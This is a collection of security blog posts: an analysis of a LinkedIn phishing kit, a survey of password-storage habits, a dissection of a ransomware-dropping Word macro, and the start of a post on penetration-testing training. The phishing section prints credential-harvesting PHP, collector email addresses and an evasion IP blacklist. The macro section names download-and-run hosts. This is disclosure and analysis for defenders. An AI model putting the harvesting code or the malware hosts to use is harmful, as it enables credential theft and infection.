The LinkedIn Real-time Messaging Phish of 2019

The LinkedIn Gangsters

A few days ago I received an invite from an old fintech colleague over the LinkedIn messaging service, the message read:

“Hi, I have attached a document for our new business financial proposal for your review. Access the proposal through the extension below and get back to me at your earliest convenience.

https://onedrive.live.com/?authkey=%21AFbNEI4K8RcVpmE&cid=EBDC72C570C985A5&id=EBDC72C570C985A5%21180&parId=root&o=OneUp

Coming from a 1st degree connection made this look like a legitimate communication. But, I haven’t been in touch with my friend for a while or have discussed any business with him recently, so this seemed a bit odd.

I texted him back via LinkedIn to verify that he indeed sent it. To my surprise, he responded in real-time with a confirmation. When I asked him if it was intended for me, he again confirmed it via the messenger application (Image 1).

LinkedIn RT Message Phish
Image 1: LinkedIn texting session

By all phishing standards, this one takes the cake. The attacker was actually conducting his exploit in real-time using my colleague’s compromised LinkedIn account. This was alarming because (1) the relatively high degree of trust that exists between you and your 1st degree network opens the door to a wide range of trust based attacks and (2) the real-time text messaging helped validate that the person that I was talking to was indeed the sender.

I switched to a sandboxed machine, clicked on the link, and went down the rabbit hole…

LinkedIn Link to OneDrive PDF
Image 2: Link from texting session to a OneDrive hosted PDF with a secondary login required to “View Message Folder”

The link to the business proposal routed to a PDF file that was hosted on a publically accessible Microsoft OneDrive folder (Image 2).

The PDF medatada indicated that it was created recently and dynamically using an Office365 MS Word. The file name was based on my colleague’s LinkedIn profile and the subject of the proposal was also related to his line of work. The author name of the PDF document had the wishful name “Incoming Wire”.

LinkedIn Phish PDF Metadata
Image 3
: The phishing PDF metadata

In order to “Continue reading your messages from OneDrive for Business”, I had to click on a second link titled “VIEW MESSAGE FOLDER”.  

The second link routed to the URL: ”https://normaav.ga/review”. This appeared to be a general access portal that aggregated different email systems and allowed the user to select their email provider of choice in order to view the “business proposal”.

LinkedIn Phish Login Portal
Image 4
: The logion portal loaded after clicking the PDF link

Clicking on the Office365 button option loaded a sign-in page and prompted me to enter my email address and the password for my Office365 account.

Normaav GA Office 365 Login
Image 5
: The fake Office365 logion page

Clicking on the other buttons resulted in the same functionality but with different email client login screens (Image 6).

LinkedIn Phish Logins
Image 6
: Other email client login pages

The amount of details built into the site was impressive. Where most phishing login pages deactivate superfluous links and features for efficiency reasons, this site was fully functional and even included the ability to reset your password–which came with a functional glyph generator and voice word reader.

Password Reset
Image 7
: Sample password reset screen

Next, I checked the .GA domain for some clues. It came back as a Gabon based account, however, the details of the registrar had the following Netherlands address:

Domain name:NORMAAV.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

After a little more digging, I found that the same owner also registered several other phishing domains that included sites like:

Domain name:TECHGURUHELP.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

So, from the look of it, this phishing site was just an elaborate email address and password collection utility. It wasn’t used for malware distribution or payload delivery.

The structure Narmaav.ga was made-up of several directories each comprised of PHP, html, images, Zip file, and some JavaScript files. The zip file housed all of the executable and site code and also provided an additional layer of obfuscation from the anti malware scanners that would be running on the hosting server.

Normaav GA File
Image 8: Sample content of one of the Narmaav.ga website “file” directory

LinkedIn Phish Directory Content
Image 9: The content of the “assets” directory showing the images and icons used to create the fake login screens

As far as the mechanics of the user data collection, clicking the “Next” button on the email login screen executed the following post function:

if (isset($_POST[‘username’]) && isset($_POST[‘password’])) {
    if ($_POST[‘username’] !== “” && $_POST[‘password’] !== “”) {

        $date = date(‘l d F Y’);
        $time = date(‘H:i’);
        $user = $_POST[‘username’];
        $pass = $_POST[‘password’];
        $source = $_POST[‘from’];
        $ip = $_SERVER[‘REMOTE_ADDR’];
        $systemInfo = systemInfo($_SERVER[‘REMOTE_ADDR’]);
        $VictimInfo1 = “| Submitted by : ” . $_SERVER[‘REMOTE_ADDR’] . ” (” . gethostbyaddr($_SERVER[‘REMOTE_ADDR’]) . “)”;
        $VictimInfo2 = “| Location : ” . $systemInfo[‘city’] . “, ” . $systemInfo[‘region’] . “, ” . $systemInfo[‘country’] . “”;
        $VictimInfo3 = “| UserAgent : ” . $systemInfo[‘useragent’] . “”;
        $VictimInfo4 = “| Browser : ” . $systemInfo[‘browser’] . “”;
        $VictimInfo5 = “| Os : ” . $systemInfo[‘os’] . “”;
        $data = “
+ ————- Scampage ————–+
+ Account Details
| Username : $user
| Password : $pass
| Source: $source
+ ——————————————+
+ Victim Information
$VictimInfo1
$VictimInfo2
$VictimInfo3
$VictimInfo4
$VictimInfo5

| Received : $date @ $time
+ ——————————————+

Its evident from the comments that the developer didn’t even bother anonymizing the variables, they just matter-of-factly named them: “Victim Information”, “Victim1”, “Scampage”, etc. Apparently, in the scammer industry, ripping off people is just another dehumanized banal job, not much different than stuffing hot dogs into a box on a production line.

Phish Victims
Image 10: Phishing victims as hot dogs

The data upload logic was also rudimentary without any fancy command and control features. Once all of the user information was collated, the content was simply posted to a “boxoffice794@gmail.com” email address. This Gmail account turned out to be just one of over 8134 emails used for data collection. The phishing site itself also came in a number of variations, with different version utilizing one or more of the listed email addresses (see a few samples below).

Password Collection Email Addresses

adamandeve10000@gmail.com

emailresult1000cc@gmail.com

boxresult81@gmail.com

johnbeng95@gmail.com

tingyangting111@gmail.com

sharoncute48@gmail.com

mrtrqbing@gmail.com

chingy555@gmail.com

cleverin15@gmail.com

edu.logs1@gmail.com

Table 1: A sampling of 10 emails out of the 8134 used by the phishing sites.

From a linguistic/semantic point of view, the creator of the site and the email accounts is most likely a native American English speaker who pays close attention to details. The verbiage on site has no spelling or major grammar issues. The composite names used in the email accounts demonstrate cleaver wordplay and use of contemporary idioms. The word generation algorithm also takes into account human readable combinations such as:

sql-injection
alibaba-reloaded
blood-money
call-me-ghost
extremely-blessed-007

Another interesting observation about the code is that it utilizes defensive strategies and countermeasures. For example, it uses a blacklist of IP addresses to stop the data uploader from running on high risk networks (like Fortinet, Kaspersky, Avg Technologies, etc.) where this activity would most likely be quickly detected and stopped. So in essence, this is a signature based form of reverse malware protection.

# _blacklist.dat  — contains address ranges to always be blocked.
#   Only IPv4 addressing is supported.
#
#   legal range formats are:
#
#   255.255.255.255                             Single address
#   255.255.255.255/16                       CIDR Mask
#   255.255.255.255/255.255.0.0       address w/mask
#   255.255.*.*                                        wildcards
#   255.255.255.0-255.255.255.255   low to high address
#
#   Comments may be added to a line starting with ‘#’ character
#   and inline comments may be added starting with ‘#’ character.
#


#  TOR SERVERS IP RANGES

96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
96.44.189.96-96.44.189.103

 

#  AMAZON IP RANGES

54.219.0.0-54.219.255.255
54.193.0.0-54.193.255.255
204.236.128.0-204.236.255.255
54.242.0.0-54.243.255.255
107.20.0.0-107.23.255.255

Table 2: Extract from the blacklist used by the application in order to avoid high risk networks

It’s noteworthy that several of the PHP functions (see sample below) contain a reference to “MADEMEN CYBER TEAM”. The code also contains references to a specific developer who is using the alias “Sage The Hurt Ice”, this name is also associated with an active PayPal account called “payp algent” and “paya_ldirect”. 

Paypa_ldirect
Image 11: The author “SAGE THE HURT ICE”

 <TABLE>
    <tr><td>________MADEMEN CYBER TEAM_________</td></tr>
    <tr><td><STRONG>$domain I.D: $login<td/></tr>
    <tr><td><STRONG>Password: $passwd</td></tr>
    <tr><td><STRONG>IP: $ip</td></tr>
    <tr><td><STRONG>Date: $server</td></tr>
    <tr><td><STRONG>country : $country</td></tr>
    <tr><td>Browser : $browserAgent</td></tr>
    <tr><td>____HACKED BY SAGE THE HURT ICE (SKYPE =PAYP ALGENT)____</td></tr>
    </BODY>

What makes this exploit so potent is that the operation is combining machine generated content, large degree of automation, and the creation of near real-time customized payloads that are based on LinkedIn account user data. Just like with a traditional mail merge operation where the customization of each letter is done by pulling content from different databases, the same takes place here, with a slight variation that the database is the user’s LinkedIn profile and the ‘mail to’ is his entire LinkedIn network.

With all of these dynamic orchestration capabilities, the cheery on the cake is that there was also a human in the loop that chatted with the target in real-time in order to confirm the authenticity of the phish.

This exploit should be a major concern for LinkedIn and its users. in 2016, LinkedIn lost 117 million user accounts (they were hacked as early as 2012 but didn’t discover it until 2016). Many of these passwords have not been changed by the users who are still unaware of the breach. This means that the perpetrators of the current phishing expedition are essentially shooting fish in a barrel.

Based on the Narmaav.ga site uptime of 4 days (before it was flagged as ‘deceptive” by the search engines), the volume of recovered passwords, and the number of concurrent phishing campaigns (about 10K), a conservative estimate for this campaign’s yield is over 100K new breached accounts.

So what can you do to avoid getting your LinkedIn account hacked? Obviously, don’t click on any links sent to you via the messenger. You should stop reusing the same password for multiple accounts and make it more complex. You should also consider using a password management system. In the long run though, your best bet is to enable two factor authentication (using your phone) for all of your accounts. Most ecommerce sites like Amazon, PayPal, and email providers already offer this as a free service and activating it is just a simple two step process.

Notes
Soon after detecting the exploit, I notified LinkedIn about the details of the breach. It took LinkedIn more than 48 hours to reply. The response I got was “We have provided this information to the correct team to review further and act based on their results.”  I haven’t heard back from them since. I have also followed up with several of the victims, who were completely unaware that someone took over their LinkedIn account and was using it to mount a phishing expedition.

If you haven’t done this for a while, It may also behoove you to login to your LinkedIn and other social media accounts just to make sure that it’s still accessible.

References
2019 State of the Phish Report (page 11-19 cover estimated recovery rates) – Proofpoint.com
The complete phishing kit  (source code and files)
The phishing email addresses directory (where the stolen credentials are sent after harvesting)
LinkedIn Breach Exposed 117 Million User Accounts – eSecurity Planet
Facebook stored 200-600 millions of Instagram passwords in plain text – IT ProPortal
Password Safe – A free and open source password management system

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

The Great Password Storage Survey

Find Milton's Password

The idea for the password survey came about more than fifteen years ago when I managed a security team in a large fortune 500 organization. While designing a new fraud detection platform, we discovered that a significant number of previous security incidents were attributed to compromised user passwords and credentials. The data suggested that this problem effected all business divisions and departments across the company and our partners. After a successful campaign to launch a corporate-wide root cause initiative, we ran a pilot that examined the password storage and retrieval practices in one of our regional offices with about 900 employees. After concluding the initial survey, we expanded the sampling to three other corporate locations.

The results of the first survey were supplemented by data I collected a few years later while working for a managed security service company that provided hosted proxy, firewall, IDS, and anti-malware service to several hundred credit unions and community banks. The focus of the second survey was on small to medium size U.S. based financial institutions.[1]

The total population examined in the study was about 3700 accounts and individuals. The corporate units included development, IT administration, business groups, and general staff. The sampled data reflects a typical cross-section of large (20K-40K) and small to medium (20-750) sized organizations and represents a historical snapshot of password practices in a typical regulated financial service company circa 2003-2010.

4-Password found by unit

Chart 1: Password found by business unit

Background
Knowledge-based authentication that utilizes passwords is different from other access control methods because it promotes the idea that by increasing the password entropy we can resist and discourage a brute force password recovery attack.

For many security practitioners this seems like a panacea. Policies calling for additional password complexity appear attractive at first but their practical enforcement on a multi-platform and enterprise scale are difficult to implement.

This is especially the case when we prohibit users from writing their passwords down or reusing them. The user’s inability to manage numerous complex and frequently expiring passwords can eventually compromise even the most secure environments that support multi-tiered firewalls and utilize the most advanced IDS, and robust VPN connectivity.

Paradoxically, it seems that when it comes to passwords, the user is caught between a rock and a hard place; the more secure the password is, the less so is the user.

Heterogynous Environments and a Glut of Passwords
The never ending cycle of M&A continues to create heterogynous platforms within the enterprise. This phenomenon results in the proliferation of systems with different rules for password lifecycles, login procedures, and authentication standards. The impact on the users has been overwhelming as they need to deal with an ever increasing number of login challenges.

Even in well consolidated enterprise that utilize state of the art Active Directory and Single Sign-On, there are a handful of work issued standalone devices and online accounts that are not tied to the central login infrastructure. Even in these integrated environments, the expiration of individual passwords is rarely synchronized, often causing a cascade of resets on other systems with user lookouts and loss of productivity.

To further complicate this, all employee also maintain dozens of non work-related passwords that they use during their work day. This significantly increases their cognitive burden, so in an effort to conserve energy, some resort to consolidating their private and work passwords into a single file. The survey suggests that if we tally the work and private accounts, the average number of user passwords each person has can exceed 60 (Chart 2).

The number of work related accounts varied with the user’s corporate responsibility (Chart 3), but on average, each had between 10-20 passwords.

1-Average number of passwords per user
Chart
2
: Average number of passwords per user

Information Overload
The human factor plays a significant role in the challenge of creating, storing, and retrieving complex passwords. A number of psychological experiments have demonstrated that subjects are able to repeat accurately around eight meaningful combinations of letters, numbers, and words.[2]

When a user is given several random passwords that are eight characters long, most will remember only one. If a user is required to remember two or more such passwords, he or she will likely resort to writing them down.

When asked how many IDs and passwords did they have to keep track of, the user’s immediate answer was “way too many!” The majority of users have also stated that it was bad enough when they only needed a handful of passwords to access e-mail, the network and mainframe accounts. But now, every internal and external application required a complex password.

2-Average number of passwords per user type
Chart 3:
Average number of passwords per user type        

3-Reason for writing passwords down

Chart 4: Reasons for writing passwords down

So how did the users resolve the problem of maintaining dozens of strong passwords? When pressed, most admitted—as the research suggested—that they resorted to keeping a written list or that they have been using the same password or a variant of it for multiple systems. 

On the record, administrative staff denied that they followed this practice but off the record they admitted that they were powerless to stop it and that they themselves were guilty of these same offenses. Other industry sources suggest that this is indeed a widespread phenomenon.[3]

When questioned about their memorization techniques (the policy requires that passwords be memorized), many of them indicated that utilizing mnemonics, backronym, and other techniques were tiresome and this resulted in forgetfulness, mistakes, and system lockouts. 

The majority of users (75%) stated that they could not memorize complex passwords and when they attempted to achieve this in the past it always resulted in password resets. It is interesting to note that as much as 10% of the users felt that the high frequency of the password expiration did not warrant the investment in memorizing it. Another 10% of the users felt that actually writing the password down made them more productive.

5-Password issued vs. password memorized
Chart 5: Password issued vs. password memorized

Password Storage Strategies
The password searches identified the existence of two types of password storage strategies. The first group (1) which consisted of 27% of the recovered passwords was made-up of data that was either handwritten or printed and stored in the user’s immediate work area. 

The written documents included artifacts such as post-it notes, legal pads, notebooks, and text on dry erase board. The second category (2) consisted of 73% of the recovered passwords found on electronic storage in the form of digital files on portable storage devices, PDAs, phones, hard drives, and network shares.

7-Password hiding locations
Chart 6: Password storage areas

The large percentage of electronically stored password suggests that users are somewhat security conscious and they do look for the middle ground between the two evils of keeping passwords out in the open and memorizing them.

The high rate of spreadsheet utilization (35%) for password storage suggests that without a proper company sponsored tool for managing passwords like a password safe, users will instinctively gravitate toward the next ‘best’ technology available in-house.

Password Hangouts
The majority (5% each) of users hid passwords either under a mouse pad or on sticky notes that were kept in a book or folder somewhere in the user’s immediate work area. The total percentage of passwords hidden ‘under’ various items (Table 1) was 27%.

Password Locations Office Work Area

# Found

% of Total

Under mouse pad, stapler, or tape dispenser

174

5%

Under keyboard

86

2%

Under desk calendar

77

2%

Under flower pot

32

1%

Under garbage can

11

0.3%

Under printer

29

1%

Under phone or phone reference card

51

1%

Under carpet or mat

7

0.2%

Under bookshelf

38

1%

Under paper tray

30

1%

Under or on whiteboard or clipboard

61

2%

Under trivet, coaster, paper weight, or pencil holder

18

0.5%

Interior door of coat cabinet

18

0.5%

Sticky note on the monitor

40

1%

Note inside a book or wallet

180

5%

Note in music CD box

67

2%

On whiteboard obfuscated using letter or number padding

72

2%

Total

1058

        27%

Table 1: Hidden password locations – Office work area

 

Password Locations on Electronic Storage

# Found

  % of Total

On floppy disk inserted in drive

15

0.4%

On USB, flash drive, or other device

80

2%

Protected spreadsheet on a password protected network share

613

17%

MS Access database on a network share

216

6%

Spreadsheet on a network share

620

17%

Text file located on a network share

281

8%

e-mail file (user would create and e-mail himself the new password)

408

11%

MS Word document

103

3%

File stored on an Intranet web site

300

8%

File stored on an Internet web site

26

1%

Total

2662

73%

Table 2: Hidden password locations – Electronic storage

 

The majority (73%) of the hidden passwords were kept on electronic storage (spreadsheets, documents, and e-mails) on a variety of locations, the most common being (1) 34% on network drive, and (2) 11% on the e-mail server (Table 2).  

Only 1% of the users openly placed the latest password on their monitor (Figure 1). It is interesting to note the password generation algorithm used. The first password on the list (which was complex) was used as the seed for all future passwords permutations. Each time the system required a new password; the user wrote the new one down and erased the previous one.

Whenever the system permitted the re-use of old passwords, we found a high degree of password recycling via password variances and sequential use. This included 62% of developers, 86% of administrators, 97% of business users, and 94% of admin and facility staff.  

8-User Passwords Written on a Sticky Pad 

Figure 1: User passwords written on a sticky note

 

Is there a Method in the madness?
75% of the user interviewed cited poor memory as the main reason (1) for writing and hiding passwords. The second (2) reason cited was the unspoken legitimacy of this practice and its widespread use. The third (3) reason was that the password was shared by several users and so having it written in a central location was the most convenient way to synchronize it and keep all users informed of any changes. This was primarily the case amongst DBAs, system administrators, and developers (87% combined). The majority of interviewees also acknowledged that they were aware of existing security policy that clearly discouraged such practices.

From conversations with administrative staff, ignorance of the law was not a factor in writing down passwords (Chart 8). Over 90% of the admins acknowledged that they knew that writing their system password down was against policy and information security directives, but they did it because they were located in a physically “secure area” that had strict access controls roles and that it was a calculated risk.

9-Percent of administrator told not to write down passwords
Chart 7: Percent of administrator told not to write down passwords

An interesting usage relationship shows that systems which periodically require users to change passwords actually trigger more people to ‘hide’ them in written form near their workstations. We estimated that the likelihood of finding written passwords near a workstation subjected to frequent password changes was 35% to 55%. At the same sites, the likelihood was only 10% to 20% for workstations connected to systems that did not enforce frequent password changes.

In many cases, over a third of the users created sequential passwords (Chart 8) such as changing Pa$$w0rd_1 to Pa$$w0rd_2. The stats for administrative users show that this practice was higher than 80% when permitted by the system. This information again is confirmed by other studies that show the user’s tendency to avoid constantly memorizing new, complex passwords and writing them down.[4]

 10-Used sequential passwords

Chart 8: Used sequential passwords

Social Factors that Contribute to Password Mismanagement
Password security relies on the premise that passwords are kept secret at all times. This is not a trivial requirement because in a typical password life cycle, there are many opportunities for compromise whenever a password is created, used, transmitted, or stored. Passwords are always vulnerable to compromise because:

  1. They need to be initially created and assigned to a user
  2. They need to be transmitted
  3. They need to be changed
  4. They need to be stored and retrieved

In this context, sharing passwords among a group of users would completely negate the need to keep it secret. When we asked the users about the practice of sharing passwords, the unanimous response was that this was a common practice exercised by all. In fact, the system and database administration and InfoSec teams which should have led the charge in fighting this phenomenon, were the largest practitioner of group password sharing (Charts 9-10).

11-Password sharing among administrators
Chart 9: Password sharing among administrators

12-Password sharing among developers
Chart 10
: Password sharing among developers

This contradictory situation raised several questions. When we asked the users about the clearly prohibited practice of password sharing they provided the following rationale:

  1. Friendliness––Users try to avoid behavior that would put them in a negative social light. Individuals who strictly protect their passwords by steadfastly refusing to write them down or share them with colleagues can be seen as anti-social.
  2. Conformity––Due to strong emphasis placed on “being a team player” and the importance of collaboration, many individuals determine that conformity is important and work hard to be sure that others see them as easygoing and trustworthy. For example, if a system administrator (an authority figure) asks a user for his log-in password, he is likely to reveal it because he doesn’t wish to seem suspicious of an authority figure.
  3. Trust––Sharing passwords between team members can be seen as a sign of collegial affiliation. If a user refuses to share a password with a co-worker, especially where such practice is commonplace, it could be seen as a sign of distrust.
  4. Unwritten work procedures––A team of co-workers will develop ‘informal’ procedures and workarounds to deal with occasional situations that impact their productivity (sharing workstations, using each other’s e-mail program, etc). Some of these workarounds may contradict official policies. Users who follow such informal procedures are normally acting in good faith; they are trying to be helpful and practical in an effort to get the job done.
  5. Responsibility––Users are aware of password policies, but continue to violate them nevertheless because they do not expect to be held accountable for breaking the rules, because “everyone” regards the regulations as unrealistic.
  6. Management Privileges––Senior employees believe that they are too busy to be expected to follow what they perceive as petty rules (which often IT and InfoSec are known to disregard).
  7. Relevancy––Some users believe they and their systems are not important enough to merit serious attention from an attacker. Some users also believe that rigorous passwords are neither truly realistic nor necessary and they do not see following information security policies as being relevant to their job requirements and/or professional reputation.

Security, Perception vs. Reality
Another interesting self-contradiction that affected user perception of password security was password reuse. When questioned about the practice of resetting passwords to previous ones, a large number of administrative users and developers stated that whenever the system permitted they did reset the new password to an older familiar one. In some cases administrator deliberately disabled password expiration policies in order to avoid the hustle. Clearly, this practice completely defeats any advantages associated with frequent password changes. 

12-Changed passwords back to original password left administrators, right developers
Chart 11: Changed passwords back to original password

When we asked the users for their rationale for ignoring security policy directives and making this and other judgment calls, the answer clustered around these topics:

  1. Lack of account privacy affected general work habits and security––When a user was regularly forced to write down his password because they lacked a tool to manage them properly, they also tended to justify keeping other sensitive information out in the open.
  2. Security mandates elicited strong emotional reactions––Users often spoke in emotional terms about unrealistic decrees, using terms like: “smoke and mirrors”, “lip service”, and “window dressing”. Further more, they said that they wanted their information to be secure and private but at the same time they had a fatalistic attitude towards security. That is, they felt resigned to accepting security breaches and privacy compromises.
  3. Inability to differentiation between security and privacy—Users didn’t distinguish between these two concepts and mostly focused on the outcome of a security breach and its impact on their work product. In one example, an administrator did not consider the common practice of shared usage of passwords by a fellow administrator to be a privacy or a security issue, when their password was discovered during the survey, they simply mitigated the damage by resetting the password and continuing the sharing practice.
  4. Multi-user applications and social interactions influenced information sharing—Collaborative work assignments and certain business process promoted password sharing. When it comes to account and password privacy, users working in a collaborative environment tended to have a more liberal and collective sense of account ownership.
  5. Few differences existed between home and business account management practices––User’s lack of concern for account privacy did not depend on their work location. They were consistent in their practices whether at home or at work. Remote users who connected via VPN were less concerned about the security of their work files because they considered the likelihood of someone hacking them at home to be minimal despite the fact that their off-site network was much less secure (many had no firewalls or up to date anti-malware protection). Also, most users working from home did not consider themselves to be the a potential target of an attack.

Conclusion
The survey results suggest that the widespread practice of users writing down passwords and keeping them in unsecured locations is a natural response to unrealistic security mandates. Users in general are concerned with productivity and view passwords management as an overhead and a dreaded chore. 

Practical password security depends on the availability of password management and enforcement mechanisms. Any password policy must on one hand balance the benefits of protection and enforcement and on the other minimize user impact. Without maintaining this careful balance, we run the risk of users coming to view policy mandates such as expiring passwords as tyrannical decrees that should be cleverly circumvented.

If a good personal and corporate security strategy depends on strong passwords—and few will argue that it does not—then the keystone of good password security is the establishment of an enterprise wide solution that will either completely eliminate passwords or facilitate the management of the entire password’s life cycle via an on-line, mobile, and off-line access.

Or as Milton Waddams would say, “Well, Ok. But… that’s the last straw. And, and I’m telling you It’s not okay because if they lock me out again and force me to memorize another complex password, I’m I’ll, I’ll, set the building on fire…”

 

Notes and References
Authentication in Internet Banking: A Lesson in Risk Management – FDIC (2007)
Uncovering Password Habits – Are Users’ Password Security Habits Improving?
The death of passwords is premature – Keeper (2016)
Microsoft admits expiring-password rules are useless – CNet (2019)

[1] Due to the sensitive nature of password surveys, conducting password storage searches should be planned and executed carefully and discreetly. Before conducting any searches, you should secure written approval from your IT, InfoSec, HR, and legal team. You should also coordinate all such activities with the local facilities team. Another good rule of thumb is to conduct all surveys in a team composed of representatives from HR and building security, this will eliminate the perception that some unknown individual is just pillaging and violating the privacy of employees after hours. Follow-up conversations with users regarding their password storage and recovery habits should be done in a private setting in a non-threatening or confrontational manner. You should make it clear to the interviewee that their cooperation is appreciated, that this will not reflect poorly on their evaluation, and the ultimate goal of this exercise helps improve the both personal and corporate data security and privacy. A $20 gift certificate to Starbucks or another popular outlet would go a long way towards easing the tensions.

[2] C. Coombs, R. Dawes, and A. Tversky, Mathematical Psychology: an Elementary Introduction. Prentice-Hall Press, (1970). And  The study by Yan, Blackwell, Anderson, and Grant “The Memorability and Security of Passwords-Some Empirical Results” (research paper, Cambridge University Computer Laboratory, 2001).  And Miller, George A. (1956). The magical number seven, plus or minus two: Some limits on our capacity for processing information. Psychological Review, 63, 81-97.

[3] Schneier on Security Write Down Your Password (2005)
Write Down Your Password

[4] Spafford, Eugene H. (1992). “Observations on reusable password choicesProceedings of the 3rd Security Symposium. Usenix, September.

 

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

Good day to you!

Khoroshiy den' dlya tebya!

The other day, I got this cryptic email. It read:

– – – – – – – – – – – – – – – –
From: Wayne Millbrand <waynem@icon.co.za>
Date: 03/27/2017 2:23 PM (GMT-05:00)
To: ***
Subject: ***

Good day to you!

I have a rather delicate issue, which touches directly to you. Don’t be surprised how do I learned about you! The fact is that I have got already a second letter from the person, I do not know which asserts that you are fraud involved. He insists, that you forced him transfer funds on your PayPal account under fictional reason. However,with this information he pointed out your private data up to address:

First Last Name
Street Address
Town
State (with capitalization error)
Zip Code

Now he is collecting information and planing to contact the police. I advise you to view the information that he sent to me. I have attached Fine.doc with a copy of all of his messages.

Document was password-protected – 4299
Please explain to me what’s happening.  I hope that all of this is a silly misunderstanding.

Best regards,

Wayne Millbrand
– – – – – – – – – – – – – – – –

Based on the fake email address and the tell-tale Anguished English, I concluded that this was just another phish. I usually delete these emails promptly, but this one had an interesting component to it: it came with a password protected MS Word document. This is somewhat unusual because they typically expect you to just launch the attachment and activate the payload immediately.

So it appears that the attack strategy was to:

  1. Send a threatening email
  2. Add some publicly available information about the recipient to make it look genuine
  3. Encrypt the document in order to hide the payload from an anti-virus scanner
  4. Provide the password in the email to allow the user to open and decrypt the file
  5. Activate the payload in the MS Word document and infect the user’s machine

Based on the version of the MS Word attachment, I’ve setup a Windows 7 virtual environment in a sandbox. I’ve also installed Microsoft Office 2016 in order to debug the payload macro, the following SysInternals utilities: ProcessMon, DiskMon, DebugView, and Wireshark to sniff the TCP traffic. 

I launched the document and entered the provided password. Inside the decrypted file, I found the following API declarations, variable names, and code:

Shell32.dll   ShellExecuteA
Kernel32     GetTempPathA
Kernel32     GetTempFileNameA
URLMon”     URLDownloadToFileA

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid () As Byte
Dim kmvbf As Long
Dim dfety As Long
Dim bvjwi As Long
Dim wbdys As Long
Dim dvywi (256) As Byte
Dim wdals As Long
Dim dwiqh As Long

API Declarations and Variables
Yaacov Apelbaum-Document OpenYaacov Apelbaum-Functions

The attack mechanism, seems to be a variation on an old theme where as soon as the user opens the file, the routine executes a URL file download from one of these two backup sources:

h t t p://adenzia.ch/_vti_cnf/bug.gif
h t t p://kingofstreets.de/class/meq.gif

The macro is quite sophisticated, it can even prompt the user to disable their firewall if the download fails. Both GIFs, “bug.gif” and “meg.gif”—despite having an appropriate header block and some image content bytes—actually carry the encoded malware.

The macro uses a subroutine to extract the executable binary from the downloaded GIFs. It stores the binary in a temp file, appends an “exe” extension to it, and then using the Explorer function ShellExecuteA, executes it in order to install additional malware. In this case, it was ransomware that encrypted the Documents folder.

Yaacov Apelbaum-Ransomware e
Image 1: The installed ransomware after installation

Interestingly, the first compromised URL used for the malware distribution was website that belongs to a company called Adenzia, a Swiss accounting and corporate services firm that ironically advertises itself as providing “Privacy and secure data storage” and:

  •   Accounting services
  •   Secure financial services
  •   Data entry from paper to digital
  •   Scanning paper data to digital
  •   Archiving data anonymously

Adenzia.ch 1

 

Adenzia.ch 2

 

Image 2: The Adenzia.ch website used for malware distribution

Mafia Scripts
Image 3: The Kingofstreets.de website used for malware distribution

Another noteworthy strategy is that both, the repurposed Swiss Adenzia.ch financial site as well as the second German kingofstreets.de gaming site required a login. This provided an additional layer of security by preventing internet security scanners from tracking down the payload by trying to follow a link to the malware.

Adenzia
Image 4: Malware distribution site login prompt

From the variable naming convention and the language of the email itself, it seems that the writer is non native English speaker from the FSU. The metadata from the Word document further supports this and suggest a strong link to a Russian origin. First, the author’s name was preserved as виньда (Vinda) and the company name came up as: SPecialiST RePack. 

SPecialiST RePack Metadata

SPecialiST RePack is a Russian digital publisher that is used for repackaging software.  According to Emsisoft malware database, they are a source of a large number of infected files and products.

SPecialiST RePack
Image 6:
Samples of SPecialiST RePack infected content

As far as the unfortunate Adenzia.ch site, it seems that it was breached in the past few months as the Wayback Machine still shows them operational on October 4, 2016.

Swiss Banking Russian Style
Image 7: The office address of Adenize in Lugano Switzerland

I’ve contacted Giovanni De Martin Cavan, the registered owner of Adenzia (who seems to have a strange history of forming companies and abandoning their websites) via email and gave him heads up that he needs to have a look at his website and corporate network. As of this date, I haven’t heard back from him. This could be an indication that either the site was a front for malware distribution from the get go or else it is no longer in business and has been abandoned.  

 

© Copyright 2017 Yaacov Apelbaum, All Rights Reserved.

Capturing the Flag

Yaacov Apelbaum - Who Knows What Evil Lurks in the Heart of a Cyber Attacker

If you are a typical cyber security practitioner, you most likely catch-up on the latest developments by visiting on-line sites like News Now and by periodically attending various vendor workshops. For the majority of InfoSec managers, the daily work grind and life/work balance challenges diminish the prospects of going back to school and plowing through hands-on in-depth training.

Over the past two decades, the corporate cursus honorum for IT management has been the much coveted MBA degree. In a large number of Fortune X00s, having an MBA from a top school was considered a prerequisite for an executive promotion. An MBA attested that an individual possessed all the current business acumen and the polish needed to take on any future corporate responsibility, it was the ultimate professional endorsement of merit.

This trend—other than having the end result of a glut of MBAs on the market—has also resulted in a shortage of highly technical cyber security managers. Consider some of the wholesale data breaches in some of the largest US retailers for 2014 alone. Check out the biographical backgrounds of some of the CISOs of the impacted companies. Not surprisingly, you will find no shortage of MBAs from top tier schools. What appears to be missing are individuals with vocational specializations in information and cyber security, and I’m not referring to rank and file CISSPs.

Of course, a common counter argument to this is that as a manager you are not supposed to know the ‘nitty gritty’ details of every technology in your corporate inventory and instead are expected to delegate to and draw on the expertise of others.

I don’t think that this is the case. Cyber security unlike databases, BI, or ecommerce, is almost entirely a low level technical play and as such, a security manager should not have any gaping holes in his knowledge or overly rely on subordinates to make sense of risk, threats and counter measures. It would be unacceptable for a airline pilot to have gaping holes about the his flight operations and him delegating the actual flight responsibility to the cabin crew.

I’ve recently had a chance to witness just how limited classical enterprise defenses have become. This is especially true when it comes to Advanced Persistent Threats. In one incident that eventually became the catalyst for me going back to school, I witnessed how one cyber attacker managed within minutes to defeat all of the traditional enterprise defenses and counter measures without even braking a sweat. Amazingly, even after the debriefing and root cause analysis, the security team was no closer to understanding how a properly configured and maintained brand name FW and an IDS/IDPS failed to stop the attack, let alone even detect it.

If you are thinking that this couldn’t happen to you, think again. In the incident that I just described, all target boxes were patched, there were strict access control measures in place, the network was sub-netted, and there were effective audit and password management systems in place.

After recovering from my momentary shock, I had an epiphany and realized that I urgently needed to re-hone my skills. I’ve heard about the SANS Institute from a number of colleagues and after checking it out, I decided to enroll in their Penetration Tester program. After juggling my bank account, my work schedule, and their course availability, I selected the following four courses:

